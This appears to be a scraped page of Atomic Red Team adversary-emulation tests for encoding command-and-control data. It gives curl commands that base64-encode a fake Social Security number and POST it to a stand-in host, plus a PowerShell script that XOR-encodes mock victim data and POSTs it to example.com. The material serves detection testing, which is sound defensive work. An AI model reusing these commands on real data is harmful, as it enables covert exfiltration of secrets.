Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.
Utilizing a common technique for posting base64 encoded data.
Supported Platforms: macOS, Linux
auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25
| Name | Description | Type | Default Value | |——|————-|——|—————| | destination_url | Destination URL to post encoded data. | url | redcanary.com| | base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE=|
1
sh
!1
2
echo -n 111-11-1111 | base64
curl -XPOST #{base64_data}.#{destination_url}
Utilizing a common technique for posting base64 encoded data.
Supported Platforms: Linux
auto_generated_guid: 2d97c626-7652-449e-a986-b02d9051c298
| Name | Description | Type | Default Value | |——|————-|——|—————| | destination_url | Destination URL to post encoded data. | url | redcanary.com| | base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE=|
1
sh
!1
2
echo -n 111-11-1111 | b64encode -r -
curl -XPOST #{base64_data}.#{destination_url}
1
sh
!1
if [ -x "$(command -v curl)" ]; then exit 0; else exit 1; fi;
1
pkg install -y curl
XOR encodes the data with a XOR key. Reference - https://gist.github.com/loadenmb/8254cee0f0287b896a05dcdc8a30042f
Supported Platforms: Windows
auto_generated_guid: c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08
| Name | Description | Type | Default Value | |——|————-|——|—————| | destination_url | Destination URL to post encoded data. | url | example.com| | plaintext | Plain text mimicking victim data sent to C2 server. | string | Path\n—-\nC:\Users\victim| | key | XOR key used for encoding the plaintext. | string | abcdefghijklmnopqrstuvwxyz123456|
1
powershell
!1
2
3
4
5
6
7
8
9
$plaintext = ([system.Text.Encoding]::UTF8.getBytes("#{plaintext}"))
$key = "#{key}"
$cyphertext = @();
for ($i = 0; $i -lt $plaintext.Count; $i++) {
$cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length];
}
$cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)
[System.Net.ServicePointManager]::Expect100Continue = $false
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $cyphertext -DisableKeepAlive